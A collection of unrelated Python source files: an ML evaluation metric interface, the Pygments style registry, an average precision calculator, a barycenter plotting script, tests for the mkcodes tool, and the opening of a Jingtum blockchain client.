logging.warning("all true labels are 0/1 when running ovr AUC")
return score
else:
logging.warning("auc is just suppose Binary Classification! return None as results")
return None
@staticmethod
def explained_variance(labels, pred_scores):
"""
Compute explain variance
Parameters
----------
labels: value list. The labels of data set.
pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Returns
----------
float
The explain variance
"""
return regression_metric.ExplainedVariance().compute(labels, pred_scores)
@staticmethod
def mean_absolute_error(labels, pred_scores):
"""
Compute mean absolute error
Parameters
----------
labels: value list. The labels of data set.
pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Returns
----------
float
A non-negative floating point.
"""
return regression_metric.MAE().compute(labels, pred_scores)
@staticmethod
def mean_squared_error(labels, pred_scores):
"""
Compute mean square error
Parameters
----------
labels: value list. The labels of data set.
pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Returns
----------
float
A non-negative floating point value
"""
return regression_metric.MSE.compute(labels, pred_scores)
@staticmethod
def median_absolute_error(labels, pred_scores):
"""
Compute median absolute error
Parameters
----------
labels: value list. The labels of data set.
pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Returns
----------
float
A positive floating point value
"""
return regression_metric.MedianAbsoluteError().compute(labels, pred_scores)
@staticmethod
def r2_score(labels, pred_scores):
"""
Compute R^2 (coefficient of determination) score
Parameters
----------
labels: value list. The labels of data set.
pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Returns
----------
float
The R^2 score
"""
return regression_metric.R2Score().compute(labels, pred_scores)
@staticmethod
def root_mean_squared_error(labels, pred_scores):
"""
Compute the root of mean square error
Parameters
----------
labels: value list. The labels of data set.
pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Return
----------
float
A positive floating point value
"""
return regression_metric.RMSE.compute(labels, pred_scores)
@staticmethod
def __to_int_list(array: np.ndarray):
return list(map(int, list(array)))
@staticmethod
def __filt_threshold(thresholds, step):
cuts = list(map(float, np.arange(0, 1, step)))
size = len(list(thresholds))
thresholds.sort(reverse=True)
index_list = [int(size * cut) for cut in cuts]
new_thresholds = [thresholds[idx] for idx in index_list]
return new_thresholds, cuts
def roc(self, labels, pred_scores):
if self.eval_type == consts.BINARY:
fpr, tpr, thresholds = roc_curve(np.array(labels), np.array(pred_scores), drop_intermediate=1)
fpr, tpr, thresholds = list(map(float, fpr)), list(map(float, tpr)), list(map(float, thresholds))
filt_thresholds, cuts = self.__filt_threshold(thresholds=thresholds, step=0.01)
new_thresholds = []
new_tpr = []
new_fpr = []
for threshold in filt_thresholds:
index = thresholds.index(threshold)
new_tpr.append(tpr[index])
new_fpr.append(fpr[index])
new_thresholds.append(threshold)
fpr = new_fpr
tpr = new_tpr
thresholds = new_thresholds
return fpr, tpr, thresholds, cuts
else:
logging.warning("roc_curve is just suppose Binary Classification! return None as results")
fpr, tpr, thresholds, cuts = None, None, None, None
return fpr, tpr, thresholds, cuts
def ks(self, labels, pred_scores):
"""
Compute Kolmogorov-Smirnov
Parameters
----------
labels: value list. The labels of data set.
pred_scores: pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Returns
----------
max_ks_interval: float max value of each tpr - fpt
fpr:
"""
if self.eval_type == consts.ONE_VS_REST:
try:
rs = classification_metric.KS().compute(labels, pred_scores)
            except Exception:
rs = [0, [0], [0], [0], [0]] # in case all labels are 0 or 1
logging.warning("all true labels are 0/1 when running ovr KS")
return rs
else:
return classification_metric.KS().compute(labels, pred_scores)
def lift(self, labels, pred_scores):
"""
Compute lift of binary classification.
Parameters
----------
labels: value list. The labels of data set.
pred_scores: pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
thresholds: value list. This parameter effective only for 'binary'. The predict scores will be 1 if it larger than thresholds, if not,
if will be 0. If not only one threshold in it, it will return several results according to the thresholds. default None
Returns
----------
float
The lift
"""
if self.eval_type == consts.BINARY:
return classification_metric.Lift().compute(labels, pred_scores)
else:
logging.warning("lift is just suppose Binary Classification! return None as results")
return None
def gain(self, labels, pred_scores):
"""
Compute gain of binary classification.
Parameters
----------
labels: value list. The labels of data set.
pred_scores: pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
thresholds: value list. This parameter effective only for 'binary'. The predict scores will be 1 if it larger than thresholds, if not,
if will be 0. If not only one threshold in it, it will return several results according to the thresholds. default None
Returns
----------
float
The gain
"""
if self.eval_type == consts.BINARY:
return classification_metric.Gain().compute(labels, pred_scores)
else:
logging.warning("gain is just suppose Binary Classification! return None as results")
return None
def precision(self, labels, pred_scores):
"""
Compute the precision
Parameters
----------
labels: value list. The labels of data set.
pred_scores: pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
thresholds: value list. This parameter effective only for 'binary'. The predict scores will be 1 if it larger than thresholds, if not,
if will be 0. If not only one threshold in it, it will return several results according to the thresholds. default None
result_filter: value list. If result_filter is not None, it will filter the label results not in result_filter.
Returns
----------
dict
The key is threshold and the value is another dic, which key is label in parameter labels, and value is the label's precision.
"""
if self.eval_type == consts.BINARY:
precision_operator = classification_metric.BiClassPrecision()
metric_scores, score_threshold, cuts = precision_operator.compute(labels, pred_scores)
return metric_scores, cuts, score_threshold
elif self.eval_type == consts.MULTY:
precision_operator = classification_metric.MultiClassPrecision()
return precision_operator.compute(labels, pred_scores)
else:
logging.warning("error:can not find classification type:{}".format(self.eval_type))
def recall(self, labels, pred_scores):
"""
Compute the recall
Parameters
----------
labels: value list. The labels of data set.
pred_scores: pred_scores: value list. The predict results of model. It should be corresponding to labels each
data.
Returns
----------
dict
The key is threshold and the value is another dic, which key is label in parameter labels, and value is the
label's recall.
"""
if self.eval_type == consts.BINARY:
recall_operator = classification_metric.BiClassRecall()
recall_res, thresholds, cuts = recall_operator.compute(labels, pred_scores)
return recall_res, cuts, thresholds
elif self.eval_type == consts.MULTY:
recall_operator = classification_metric.MultiClassRecall()
return recall_operator.compute(labels, pred_scores)
else:
logging.warning("error:can not find classification type:{}".format(self.eval_type))
def accuracy(self, labels, pred_scores, normalize=True):
"""
Compute the accuracy
Parameters
----------
labels: value list. The labels of data set.
pred_scores: pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
normalize: bool. If true, return the fraction of correctly classified samples, else returns the number of correctly classified samples
Returns
----------
dict
the key is threshold and the value is the accuracy of this threshold.
"""
if self.eval_type == consts.BINARY:
acc_operator = classification_metric.BiClassAccuracy()
acc_res, thresholds, cuts = acc_operator.compute(labels, pred_scores, normalize)
return acc_res, cuts, thresholds
elif self.eval_type == consts.MULTY:
acc_operator = classification_metric.MultiClassAccuracy()
return acc_operator.compute(labels, pred_scores, normalize)
else:
logging.warning("error:can not find classification type:".format(self.eval_type))
def f1_score(self, labels, pred_scores):
"""
compute f1_score for binary classification result
"""
if self.eval_type == consts.BINARY:
f1_scores, score_threshold, cuts = classification_metric.FScore().compute(labels, pred_scores)
return list(f1_scores), list(cuts), list(score_threshold)
else:
logging.warning('error: f-score metric is for binary classification only')
def confusion_mat(self, labels, pred_scores):
"""
compute confusion matrix
"""
if self.eval_type == consts.BINARY:
sorted_labels, sorted_scores = classification_metric.sort_score_and_label(labels, pred_scores)
score_threshold, cuts = classification_metric.ThresholdCutter.cut_by_step(sorted_scores, steps=0.01)
score_threshold.append(0)
confusion_mat = classification_metric.ConfusionMatrix.compute(sorted_labels, sorted_scores,
score_threshold,
ret=['tp', 'fp', 'fn', 'tn'])
confusion_mat['tp'] = self.__to_int_list(confusion_mat['tp'])
confusion_mat['fp'] = self.__to_int_list(confusion_mat['fp'])
confusion_mat['fn'] = self.__to_int_list(confusion_mat['fn'])
confusion_mat['tn'] = self.__to_int_list(confusion_mat['tn'])
return confusion_mat, cuts, score_threshold
else:
            logging.warning('error: confusion matrix is for binary classification only')
def psi(self, train_scores, validate_scores, train_labels, validate_labels, debug=False):
"""
Compute the PSI index
Parameters
----------
train_scores: The predict results of train data
validate_scores: The predict results of validate data
train_labels: labels of train set
validate_labels: labels of validate set
debug: print additional info
"""
if self.eval_type == consts.BINARY:
psi_computer = classification_metric.PSI()
psi_scores, total_psi, expected_interval, expected_percentage, actual_interval, actual_percentage, \
train_pos_perc, validate_pos_perc, intervals = psi_computer.compute(train_scores, validate_scores,
debug=debug, str_intervals=True,
round_num=6, train_labels=train_labels
,validate_labels=validate_labels)
len_list = np.array([len(psi_scores), len(expected_interval), len(expected_percentage), len(actual_interval)
, len(actual_percentage), len(intervals)])
assert (len_list == len(psi_scores)).all()
return list(psi_scores), total_psi, self.__to_int_list(expected_interval), list(expected_percentage), \
self.__to_int_list(actual_interval), list(actual_percentage), list(train_pos_perc), \
list(validate_pos_perc), intervals
else:
logging.warning('error: psi metric is for binary classification only')
def quantile_pr(self, labels, pred_scores):
if self.eval_type == consts.BINARY:
p = classification_metric.BiClassPrecision(cut_method='quantile', remove_duplicate=False)
r = classification_metric.BiClassRecall(cut_method='quantile', remove_duplicate=False)
p_scores, score_threshold, cuts = p.compute(labels, pred_scores)
r_scores, score_threshold, cuts = r.compute(labels, pred_scores)
p_scores = list(map(list, np.flip(p_scores, axis=0)))
r_scores = list(map(list, np.flip(r_scores, axis=0)))
score_threshold = list(np.flip(score_threshold))
return p_scores, r_scores, score_threshold
else:
logging.warning('error: pr quantile is for binary classification only')
@staticmethod
def jaccard_similarity_score(labels, pred_labels):
"""
Compute the Jaccard similarity score
Parameters
----------
labels: value list. The labels of data set.
pred_labels: value list. The predict results of model. It should be corresponding to labels each data.
Return
----------
float
A positive floating point value
"""
return clustering_metric.JaccardSimilarityScore().compute(labels, pred_labels)
@staticmethod
def fowlkes_mallows_score(labels, pred_labels):
"""
Compute the Fowlkes Mallows score
Parameters
----------
labels: value list. The labels of data set.
pred_labels: value list. The predict results of model. It should be corresponding to labels each data.
Return
----------
float
A positive floating point value
"""
return clustering_metric.FowlkesMallowsScore().compute(labels, pred_labels)
@staticmethod
def adjusted_rand_score(labels, pred_labels):
"""
Compute the adjusted-rand score
Parameters
----------
labels: value list. The labels of data set.
pred_labels: value list. The predict results of model. It should be corresponding to labels each data.
Return
----------
float
A positive floating point value
"""
return clustering_metric.AdjustedRandScore().compute(labels, pred_labels)
@staticmethod
def davies_bouldin_index(cluster_avg_intra_dist, cluster_inter_dist):
"""
Compute the davies_bouldin_index
Parameters
"""
## process data from evaluation
return clustering_metric.DaviesBouldinIndex().compute(cluster_avg_intra_dist, cluster_inter_dist)
@staticmethod
def contingency_matrix(labels, pred_labels):
"""
"""
return clustering_metric.ContengincyMatrix().compute(labels, pred_labels)
@staticmethod
def distance_measure(cluster_avg_intra_dist, cluster_inter_dist, max_radius):
"""
"""
return clustering_metric.DistanceMeasure().compute(cluster_avg_intra_dist, cluster_inter_dist, max_radius)
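# A minimal usage sketch (toy labels/scores, not FATE data; assumes a binary task):
#
# if __name__ == "__main__":
#     metric = MetricInterface(pos_label=1, eval_type=consts.BINARY)
#     y_true = [0, 1, 1, 0, 1]
#     y_prob = [0.1, 0.8, 0.65, 0.3, 0.9]
#     print(metric.auc(y_true, y_prob))                        # plain sklearn AUC under the hood
#     print(MetricInterface.mean_absolute_error([1.0, 2.0], [1.1, 1.9]))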
|
the-stack_106_15858
|
# -*- coding: utf-8 -*-
"""
pygments.styles
~~~~~~~~~~~~~~~
Contains built-in styles.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.plugin import find_plugin_styles
from pygments.util import ClassNotFound
#: Maps style names to 'submodule::classname'.
STYLE_MAP = {
'default': 'default::DefaultStyle',
'emacs': 'emacs::EmacsStyle',
'friendly': 'friendly::FriendlyStyle',
'colorful': 'colorful::ColorfulStyle',
'autumn': 'autumn::AutumnStyle',
'murphy': 'murphy::MurphyStyle',
'manni': 'manni::ManniStyle',
'monokai': 'monokai::MonokaiStyle',
'perldoc': 'perldoc::PerldocStyle',
'pastie': 'pastie::PastieStyle',
'borland': 'borland::BorlandStyle',
'trac': 'trac::TracStyle',
'native': 'native::NativeStyle',
'fruity': 'fruity::FruityStyle',
'bw': 'bw::BlackWhiteStyle',
'vim': 'vim::VimStyle',
'vs': 'vs::VisualStudioStyle',
'tango': 'tango::TangoStyle',
'rrt': 'rrt::RrtStyle',
'xcode': 'xcode::XcodeStyle',
'igor': 'igor::IgorStyle',
}
def get_style_by_name(name):
if name in STYLE_MAP:
mod, cls = STYLE_MAP[name].split('::')
builtin = "yes"
else:
for found_name, style in find_plugin_styles():
if name == found_name:
return style
# perhaps it got dropped into our styles package
builtin = ""
mod = name
cls = name.title() + "Style"
try:
mod = __import__('pygments.styles.' + mod, None, None, [cls])
except ImportError:
raise ClassNotFound("Could not find style module %r" % mod +
(builtin and ", though it should be builtin") + ".")
try:
return getattr(mod, cls)
except AttributeError:
raise ClassNotFound("Could not find style class %r in style module." % cls)
def get_all_styles():
"""Return an generator for all styles by name,
both builtin and plugin."""
for name in STYLE_MAP:
yield name
for name, _ in find_plugin_styles():
yield name
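# Example usage sketch (only the helpers defined above plus standard Style attributes):
#
# if __name__ == '__main__':
#     style_cls = get_style_by_name('monokai')
#     print(style_cls.background_color)     # every Style subclass defines background_color
#     print(sorted(get_all_styles())[:5])   # a few of the registered style names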
|
the-stack_106_15859
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Calculate or keep track of the interpolated average precision.
It provides an interface for calculating interpolated average precision for an
entire list or the top-n ranked items. For the definition of the
(non-)interpolated average precision:
http://trec.nist.gov/pubs/trec15/appendices/CE.MEASURES06.pdf
Example usages:
1) Use it as a static function call to directly calculate average precision for
a short ranked list in the memory.
```
import random
p = np.array([random.random() for _ in xrange(10)])
a = np.array([random.choice([0, 1]) for _ in xrange(10)])
ap = average_precision_calculator.AveragePrecisionCalculator.ap(p, a)
```
2) Use it as an object for long ranked list that cannot be stored in memory or
the case where partial predictions can be observed at a time (Tensorflow
predictions). In this case, we first call the function accumulate many times
to process parts of the ranked list. After processing all the parts, we call
peek_interpolated_ap_at_n.
```
p1 = np.array([random.random() for _ in xrange(5)])
a1 = np.array([random.choice([0, 1]) for _ in xrange(5)])
p2 = np.array([random.random() for _ in xrange(5)])
a2 = np.array([random.choice([0, 1]) for _ in xrange(5)])
# interpolated average precision at 10 using 1000 break points
calculator = average_precision_calculator.AveragePrecisionCalculator(10)
calculator.accumulate(p1, a1)
calculator.accumulate(p2, a2)
ap3 = calculator.peek_ap_at_n()
```
"""
import heapq
import random
import numbers
import numpy
class AveragePrecisionCalculator(object):
"""Calculate the average precision and average precision at n."""
def __init__(self, top_n=None):
"""Construct an AveragePrecisionCalculator to calculate average precision.
This class is used to calculate the average precision for a single label.
Args:
top_n: A positive Integer specifying the average precision at n, or
None to use all provided data points.
Raises:
ValueError: An error occurred when the top_n is not a positive integer.
"""
if not ((isinstance(top_n, int) and top_n >= 0) or top_n is None):
raise ValueError("top_n must be a positive integer or None.")
self._top_n = top_n # average precision at n
self._total_positives = 0 # total number of positives have seen
self._heap = [] # max heap of (prediction, actual)
@property
def heap_size(self):
"""Gets the heap size maintained in the class."""
return len(self._heap)
@property
def num_accumulated_positives(self):
"""Gets the number of positive samples that have been accumulated."""
return self._total_positives
def accumulate(self, predictions, actuals, num_positives=None):
"""Accumulate the predictions and their ground truth labels.
After the function call, we may call peek_ap_at_n to actually calculate
the average precision.
Note predictions and actuals must have the same shape.
Args:
predictions: a list storing the prediction scores.
actuals: a list storing the ground truth labels. Any value
larger than 0 will be treated as positives, otherwise as negatives.
num_positives = If the 'predictions' and 'actuals' inputs aren't complete,
then it's possible some true positives were missed in them. In that case,
you can provide 'num_positives' in order to accurately track recall.
Raises:
ValueError: An error occurred when the format of the input is not the
numpy 1-D array or the shape of predictions and actuals does not match.
"""
if len(predictions) != len(actuals):
raise ValueError("the shape of predictions and actuals does not match.")
    if num_positives is not None:
      if not isinstance(num_positives, numbers.Number) or num_positives < 0:
        raise ValueError("'num_positives' was provided but it wasn't a "
                         "non-negative number.")
      self._total_positives += num_positives
    else:
      self._total_positives += numpy.size(numpy.where(actuals > 0))
topk = self._top_n
heap = self._heap
for i in range(numpy.size(predictions)):
if topk is None or len(heap) < topk:
heapq.heappush(heap, (predictions[i], actuals[i]))
else:
if predictions[i] > heap[0][0]: # heap[0] is the smallest
heapq.heappop(heap)
heapq.heappush(heap, (predictions[i], actuals[i]))
def clear(self):
"""Clear the accumulated predictions."""
self._heap = []
self._total_positives = 0
def peek_ap_at_n(self):
"""Peek the non-interpolated average precision at n.
Returns:
The non-interpolated average precision at n (default 0).
If n is larger than the length of the ranked list,
the average precision will be returned.
"""
if self.heap_size <= 0:
return 0
predlists = numpy.array(list(zip(*self._heap)))
ap = self.ap_at_n(predlists[0],
predlists[1],
n=self._top_n,
total_num_positives=self._total_positives)
return ap
@staticmethod
def ap(predictions, actuals):
"""Calculate the non-interpolated average precision.
Args:
predictions: a numpy 1-D array storing the sparse prediction scores.
actuals: a numpy 1-D array storing the ground truth labels. Any value
larger than 0 will be treated as positives, otherwise as negatives.
Returns:
The non-interpolated average precision at n.
If n is larger than the length of the ranked list,
the average precision will be returned.
Raises:
ValueError: An error occurred when the format of the input is not the
numpy 1-D array or the shape of predictions and actuals does not match.
"""
return AveragePrecisionCalculator.ap_at_n(predictions,
actuals,
n=None)
@staticmethod
def ap_at_n(predictions, actuals, n=20, total_num_positives=None):
"""Calculate the non-interpolated average precision.
Args:
predictions: a numpy 1-D array storing the sparse prediction scores.
actuals: a numpy 1-D array storing the ground truth labels. Any value
larger than 0 will be treated as positives, otherwise as negatives.
n: the top n items to be considered in ap@n.
total_num_positives : (optionally) you can specify the number of total
positive
in the list. If specified, it will be used in calculation.
Returns:
The non-interpolated average precision at n.
If n is larger than the length of the ranked list,
the average precision will be returned.
Raises:
ValueError: An error occurred when
1) the format of the input is not the numpy 1-D array;
2) the shape of predictions and actuals does not match;
3) the input n is not a positive integer.
"""
if len(predictions) != len(actuals):
raise ValueError("the shape of predictions and actuals does not match.")
if n is not None:
if not isinstance(n, int) or n <= 0:
raise ValueError("n must be 'None' or a positive integer."
" It was '%s'." % n)
ap = 0.0
predictions = numpy.array(predictions)
actuals = numpy.array(actuals)
# add a shuffler to avoid overestimating the ap
predictions, actuals = AveragePrecisionCalculator._shuffle(predictions,
actuals)
sortidx = sorted(
range(len(predictions)),
key=lambda k: predictions[k],
reverse=True)
if total_num_positives is None:
numpos = numpy.size(numpy.where(actuals > 0))
else:
numpos = total_num_positives
if numpos == 0:
return 0
if n is not None:
numpos = min(numpos, n)
delta_recall = 1.0 / numpos
poscount = 0.0
# calculate the ap
r = len(sortidx)
if n is not None:
r = min(r, n)
for i in range(r):
if actuals[sortidx[i]] > 0:
poscount += 1
ap += poscount / (i + 1) * delta_recall
return ap
@staticmethod
def _shuffle(predictions, actuals):
random.seed(0)
suffidx = random.sample(range(len(predictions)), len(predictions))
predictions = predictions[suffidx]
actuals = actuals[suffidx]
return predictions, actuals
@staticmethod
def _zero_one_normalize(predictions, epsilon=1e-7):
"""Normalize the predictions to the range between 0.0 and 1.0.
For some predictions like SVM predictions, we need to normalize them before
calculate the interpolated average precision. The normalization will not
change the rank in the original list and thus won't change the average
precision.
Args:
predictions: a numpy 1-D array storing the sparse prediction scores.
epsilon: a small constant to avoid denominator being zero.
Returns:
The normalized prediction.
"""
denominator = numpy.max(predictions) - numpy.min(predictions)
    ret = (predictions - numpy.min(predictions)) / numpy.maximum(denominator,
                                                                 epsilon)
return ret
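# A small self-check sketch mirroring the module docstring (toy data, commented out):
#
# if __name__ == "__main__":
#   calc = AveragePrecisionCalculator(top_n=3)
#   calc.accumulate(numpy.array([0.9, 0.1, 0.8, 0.4]), numpy.array([1, 0, 0, 1]))
#   print(calc.peek_ap_at_n())  # AP@3 over the accumulated (prediction, label) pairs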
|
the-stack_106_15860
|
import numpy as np
import torch
from matplotlib import pyplot as plt
from matplotlib.lines import Line2D
from sinkhorn_barycenters import barycenter
from utils import gengaussians
params = {"legend.fontsize": 18,
"axes.titlesize": 16,
"axes.labelsize": 16,
"xtick.labelsize": 13,
"ytick.labelsize": 13,
"pdf.fonttype": 42}
plt.rcParams.update(params)
if __name__ == "__main__":
seed = 42
rng = np.random.RandomState(seed)
n_hists = 2
masses = np.ones(n_hists)
n_features = 500
epsilons = np.array([100, 200, 500]) / n_features
grid = np.linspace(-5, 5, n_features)
loc = np.array([-3, 3])
std = np.array([0.4, 0.4])
P = gengaussians(grid, n_hists, loc=loc, scale=std) + 1e-10
M = (grid[:, None] - grid[None, :]) ** 2
Pt = torch.tensor(P)
bars = []
bars_div = []
bars_prod = []
tol = 0.001 / n_features
for epsilon in epsilons:
K = np.exp(- M / epsilon)
Kt = torch.tensor(K)
bar = barycenter(Pt, Kt, reference="uniform", tol=tol)
bar_deb = barycenter(Pt, Kt, reference="debiased", tol=tol)
bar_prod = barycenter(Pt, Kt, reference="product", tol=tol)
bars.append(bar)
bars_div.append(bar_deb)
bars_prod.append(bar_prod)
colors = ["darkblue", "salmon", "mediumaquamarine"]
names = [r"$\alpha_{OT^{\mathcal{U}}_{\varepsilon}}$ (IBP)",
r"$\alpha_{OT^{\otimes}_{\varepsilon}}$",
r"$\alpha_{S_{\varepsilon}}$ (proposed)"]
styles = ["-", "-", "-"]
legend = [Line2D([0], [0], color=color,
label=name, linewidth=2, ls=ls)
for color, name, ls in zip(colors, names, styles)]
f, axes = plt.subplots(1, 3, figsize=(9, 3), sharex=True, sharey=True)
for ax, bar, bar_prod, bar_div, eps in zip(axes.ravel(), bars,
bars_prod, bars_div, epsilons):
ax.plot(grid, P, color="k", alpha=0.7)
ax.plot(grid, bar_prod, color="salmon", lw=2, ls=styles[1])
ax.plot(grid, bar, color="darkblue", lw=2, ls=styles[0])
ax.plot(grid, bar_div, color="mediumaquamarine", lw=3, ls=styles[2])
eps = np.round(eps, 2)
ax.set_title(r"$\varepsilon$ = %s" % eps)
ax.set_ylim([0., 0.04])
plt.savefig("fig/gaussians.pdf", tight_layout=True)
plt.figure(figsize=(10, 1))
plt.axis("off")
plt.legend(handles=legend, ncol=3)
# plt.show()
plt.savefig("fig/gaussians-legend.pdf", tight_layout=True)
|
the-stack_106_15862
|
import os
import shutil
import textwrap
import unittest
import subprocess
import click.testing
import mkcodes
class TestBase(unittest.TestCase):
outputfile = 'tests/output/output.py'
def tearDown(self):
shutil.rmtree('tests/output', ignore_errors=True)
@classmethod
def call(cls, *flags, inputfile='tests/data/some.md'):
runner = click.testing.CliRunner()
runner.invoke(mkcodes.main,
['--output', cls.outputfile] + list(flags) + [inputfile])
def assertFileEqual(self, filename, expected):
with open(filename, 'r') as output:
self.assertEqual(output.read(), textwrap.dedent(expected))
class TestMarkdown(TestBase):
def assertOutput(self, expected):
self.assertFileEqual(self.outputfile, expected)
@unittest.skip
def test_markdown_safe(self):
raise NotImplementedError
def test_github_safe(self):
self.call('--github', '--safe')
self.assertOutput("""\
bar = False
backticks = range(5, 7)
""")
def test_markdown_unsafe(self):
self.call('--markdown', '--unsafe')
self.assertOutput("""\
baz = None
""")
def test_github_unsafe(self):
self.call('--github', '--unsafe')
self.assertOutput("""\
foo = True
bar = False
backticks = range(5, 7)
""")
class TestInputs(TestBase):
def assertOutputFileEqual(self, filename, expected):
self.assertFileEqual(os.path.join('tests/output', filename), expected)
@staticmethod
def _output_path_exists(path):
return os.path.exists(os.path.join('tests/output', path))
@classmethod
def call(cls, *args, **kwargs):
super().call('--github', *args, **kwargs)
def test_file(self):
self.call()
self.assertTrue(self._output_path_exists('output.py'))
def test_file_without_code(self):
"""Code files should not be written for markdown files with no code."""
self.call(inputfile='tests/data/nocode.md')
self.assertFalse(self._output_path_exists('nocode.py'))
def test_directory(self):
self.call(inputfile='tests/data')
self.assertTrue(self._output_path_exists('output.py'))
def test_directory_recursive(self):
self.call(
'--output', 'tests/output/{name}.py', '--github', 'tests/data')
self.assertTrue(self._output_path_exists('some.py'))
self.assertTrue(self._output_path_exists('other.py'))
self.assertTrue(self._output_path_exists('nest/deep.py'))
self.assertFalse(self._output_path_exists('not_markdown.py'))
self.assertTrue(self._output_path_exists('nest/more/why.py'))
def test_multiple(self):
self.call(
'--output', 'tests/output/{name}.py', '--github',
'tests/data/some.md', 'tests/data/other.md')
self.assertOutputFileEqual('some.py', """\
bar = False
backticks = range(5, 7)
""")
self.assertOutputFileEqual('other.py', """\
qux = 4
""")
self.assertFalse(self._output_path_exists('nest/deep.py'))
def test_unexistant_output_directory(self):
self.call(
'--output', 'tests/output/unexistant/{name}.py',
'--github', 'tests/data/some.md')
self.assertOutputFileEqual('unexistant/some.py', """\
bar = False
backticks = range(5, 7)
""")
def test_prefixed_deep_blocks(self):
self.call(
'--output', 'tests/output/test_{name}.py', '--github',
'tests/data')
self.assertTrue(self._output_path_exists('test_some.py'))
self.assertTrue(self._output_path_exists('test_other.py'))
self.assertTrue(self._output_path_exists('nest/test_deep.py'))
self.assertTrue(self._output_path_exists('nest/more/test_why.py'))
self.assertTrue(self._output_path_exists('nest/less/test_why.py'))
# Check that mkcodes can actually output a valid test directory.
proc = subprocess.run(
['python3', '-m', 'unittest', 'discover', 'tests/output'],
capture_output=True, text=True)
self.assertIn('Ran 2 tests', proc.stderr)
self.assertIn('OK', proc.stderr)
def test_other_languages(self):
self.call(
'--output', 'tests/output/test_{name}.{ext}',
'--github', 'tests/langdata')
self.assertTrue(self._output_path_exists('test_java.java'))
self.assertTrue(self._output_path_exists('test_csharp.cs'))
self.assertFalse(self._output_path_exists('test_csharp.csharp'))
self.assertTrue(self._output_path_exists('test_multilang.cs'))
self.assertTrue(self._output_path_exists('test_multilang.java'))
self.assertTrue(self._output_path_exists('test_multilang.py'))
self.assertTrue(self._output_path_exists('test_multilang.js'))
self.assertTrue(self._output_path_exists('no_py_tree/test_clean.js'))
self.assertFalse(self._output_path_exists('no_py_tree/__init__.py'))
self.assertTrue(self._output_path_exists('pytree/test_buried.py'))
self.assertTrue(self._output_path_exists('pytree/__init__.py'))
# __init__.py should not be created in the base output directory.
self.assertFalse(self._output_path_exists('__init__.py'))
@unittest.skip
def test_glob(self):
raise NotImplementedError
if __name__ == '__main__':
unittest.main()
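# The suite can also be run with unittest discovery from the repository root
# (the tests/ layout is assumed from the data paths used above):
#   python -m unittest discover tests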
|
the-stack_106_15864
|
"""
* Created with PyCharm.
* User: 彭诗杰
* Date: 2018/5/3
* Time: 11:25
* Description: main handler for the backend system
* one Remote object per server; few options. Configuration Parameters:
* {
* local_sign: false, // default sign tx in jingtumd
* }
"""
import json
import math
from numbers import Number
from eventemitter import EventEmitter
from jingtum_python_baselib.utils import *
from jingtum_python_baselib.wallet import Wallet
from jingtum_python_lib.config import Config
from jingtum_python_lib.request import Request
from jingtum_python_lib.server import Server, WebSocketServer
from jingtum_python_lib.transaction import RelationTypes, AccountSetTypes, set_clear_flags, OfferTypes, Transaction
from jingtum_python_lib.utils import LRUCache, utils, process_tx, is_number
# LEDGER_OPTIONS = ['closed', 'header', 'current']
"""
* ---------------------- transaction request --------------------
**
* return string if swt amount
* @param amount
* @returns {Amount}
"""
def to_amount(amount):
if amount.__contains__('value') and int(float(amount['value'])) > 100000000000:
return Exception('invalid amount: amount\'s maximum value is 100000000000')
if amount['currency'] == Config.currency:
# return new String(parseInt(Number(amount.value) * 1000000.00))
return str(int(float(amount['value']) * 1000000))
return amount
class Remote:
def __init__(self, local_sign=False):
# self.url = options['server']
self.local_sign = local_sign
self.server = WebSocketServer(self)
self.status = {"ledger_index": 0}
self.requests = {}
        self.cache = LRUCache(100)  # 100 entries; cache for generic query results
        self.path = LRUCache(2100)  # 2100 entries; cache for path-finding results
self.emitter = EventEmitter()
"""
    the callback parameter defaults to None since it is currently unused
"""
def connect(self, callback=None):
"""
        connect to the server; this must be done before any other request
:param callback:(error, result)
:return:
"""
if not self.server:
return 'server not ready'
return self.server.connect(callback)
def get_connect_info(self):
"""
get connection info
"""
if not self.server:
return 'server not ready'
data = self.server.socket_open()
if isinstance(data, dict) and data['callback']:
data = json.loads(data['callback'])
if data['status'] == 'success':
return data['result']
else:
return data
def is_connected(self):
"""
check is remote is connected to jingtum
:return:
"""
return self.server.connected
def disconnect(self):
self.server.ws.close()
self.server.connected = False
self.server.opened = False
def handle_message(self, data):
        # exception handling may be needed here
        data = json.loads(data)
        if not data:
            return
        msg_type = data.get('type')
        if msg_type == 'ledgerClosed':
            self.handle_ledger_closed(data)
        elif msg_type == 'serverStatus':
            self.handle_server_status(data)
        elif msg_type == 'response':
            self.handle_response(data)
        elif msg_type == 'transaction':
            self.handle_transaction(data)
        elif msg_type == 'path_find':
            self.handle_path_find(data)
def handle_ledger_closed(self, data):
"""
update server ledger status
        supplies ledger, reserve and fee data to the outside
        :param data:
        :return:
        """
        if data['ledger_index'] > self.status['ledger_index']:
            self.status['ledger_index'] = data['ledger_index']
            self.status['ledger_time'] = data['ledger_time']
            self.status['reserve_base'] = data['reserve_base']
            self.status['reserve_inc'] = data['reserve_inc']
            self.status['fee_base'] = data['fee_base']
            self.status['fee_ref'] = data['fee_ref']
self.emitter.emit('ledger_closed', data)
def handle_server_status(self, data):
"""
supply data to outside about server status
:param data:
:return:
"""
self.update_server_status(data)
self.emitter.emit('server_status', data)
def update_server_status(self, data):
        self.status['load_base'] = data['load_base']
        self.status['load_factor'] = data['load_factor']
        if data.get('pubkey_node'):
            self.status['pubkey_node'] = data['pubkey_node']
        self.status['server_status'] = data['server_status']
        online = data['server_status'] in Server.online_states
